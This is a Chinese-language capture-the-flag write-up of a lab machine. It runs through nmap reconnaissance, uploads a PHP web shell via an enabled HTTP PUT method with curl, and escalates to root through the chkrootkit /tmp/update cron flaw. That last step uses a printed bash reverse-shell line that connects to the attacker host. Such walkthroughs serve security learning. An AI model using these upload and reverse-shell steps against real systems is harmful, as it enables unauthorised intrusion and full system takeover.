信息收集

# Nmap 7.94 scan initiated Wed Nov 22 22:16:22 2023 as: nmap -sn -oN live.nmap 192.168.182.0/24
Nmap scan report for 192.168.182.1 (192.168.182.1)
Host is up (0.00028s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.182.2 (192.168.182.2)
Host is up (0.00017s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.182.143 (192.168.182.143)
Host is up (0.00021s latency).
MAC Address: 00:0C:29:88:7E:62 (VMware)
Nmap scan report for 192.168.182.254 (192.168.182.254)
Host is up (0.00061s latency).
MAC Address: 00:50:56:FB:5B:30 (VMware)
Nmap scan report for 192.168.182.130 (192.168.182.130)
Host is up.
# Nmap done at Wed Nov 22 22:16:24 2023 -- 256 IP addresses (5 hosts up) scanned in 1.97 seconds

# Nmap 7.94 scan initiated Wed Nov 22 22:16:53 2023 as: nmap -sT --min-rate 10000 -p- -oN port.nmap 192.168.182.143
Nmap scan report for 192.168.182.143 (192.168.182.143)
Host is up (0.0046s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:88:7E:62 (VMware)

# Nmap done at Wed Nov 22 22:17:07 2023 -- 1 IP address (1 host up) scanned in 13.68 seconds

# Nmap 7.94 scan initiated Wed Nov 22 22:17:27 2023 as: nmap -sT -sC -sV -O -p22,80 -oN details.nmap 192.168.182.143
Nmap scan report for 192.168.182.143 (192.168.182.143)
Host is up (0.00081s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:88:7E:62 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|phone
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (93%), Google Android 5.X|6.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:4.1 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:google:android:5 cpe:/o:google:android:6 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.2 - 4.9 (93%), Linux 3.16 - 4.6 (92%), Linux 4.4 (92%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%), Linux 4.10 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 22 22:17:42 2023 -- 1 IP address (1 host up) scanned in 15.83 seconds

# Nmap 7.94 scan initiated Wed Nov 22 22:19:30 2023 as: nmap -sT --script=vuln -p22,80 -oN vuln.nmap 192.168.182.143
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.182.143 (192.168.182.143)
Host is up (0.00076s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
MAC Address: 00:0C:29:88:7E:62 (VMware)

# Nmap done at Wed Nov 22 22:21:16 2023 -- 1 IP address (1 host up) scanned in 105.75 seconds

整个信息收集做下来，没有什么发现，有一个test的路径！

下面做了目录的爆破
但是还是只有index.php 和 test

整个靶机就只开放了22端口和80端口。

渗透测试

尝试访问一下80端口上的服务！

什么都没有，源码也看了，看下test目录：（PS：翻译了这个图片上面的英文~）

test目录下面什么都没有~ 到这里说实话我并不知道我应该怎么去测试了~看了大佬们wp，更改请求方式！

利用OPTIONS方法，来查看请求/响应支持的方法！可以看到存在PUT方法！因此我们可以尝试PUT方法来上传文件到test目录下面！

直接使用curl命令来上传！

curl -X PUT -T shell.php http://192.168.182.144/test/

确实发现上传成功！

直接上传反弹shell的php马子上去！

MSF起监听器，发现，反弹shell确实执行了，但是我们并没有接收到会话！可能是存在防火墙的原因？

换一个能出网的常用端口作为监听的端口试试（换成了443端口，同时换了马）

成功的接收到了shell：

提权

查看etc/passwd文件，看存在哪些用户信息：

存在john用户！起一个hydra进行爆破下：

没成功~ 查看定时任务：

没见过的提权方式~

由于前面提示我们病毒，查看定时任务的时候，发现了一个chkrootkit工具！

并且这个工具是可以以root权限执行的！该工具存在本地提权漏洞~

首先了解下什么是rootkit！rootkit是一种内核型蠕虫病毒~ 而chkrootkit是一个在本地检查rootkit迹象的工具，chkrootkit有crontab，会定期的以root身份执行/tmp/update文件~如果攻击者知道管理员是定期的运行chkrootkit（通过查看/etc/cron.daily得知），并且对/tmp有写访问权限的话，就可以利用该漏洞获取root权限。

因此就在tmp/update目录下面写反弹shell的木马！

printf "#!/bin/bash\nbash -i >& /dev/tcp/192.168.182.130/443 0>&1\n" >/tmp/update

然后给这个文件777的权限，监听443端口即可

总结

        整个靶标打下来的体验就是，学到了太多了！之前在公司实习的时候，都会测试是不是存在不合适的请求方法~比如说是PUT 但是一直没有深入的利用过，因此也不知道他的危害性这么大！

        第二点就是提权，我尝试了相关的内核漏洞提权，我没有成功~没想到还是在定时任务上出现的提权方式，又学到了一种提权的方法~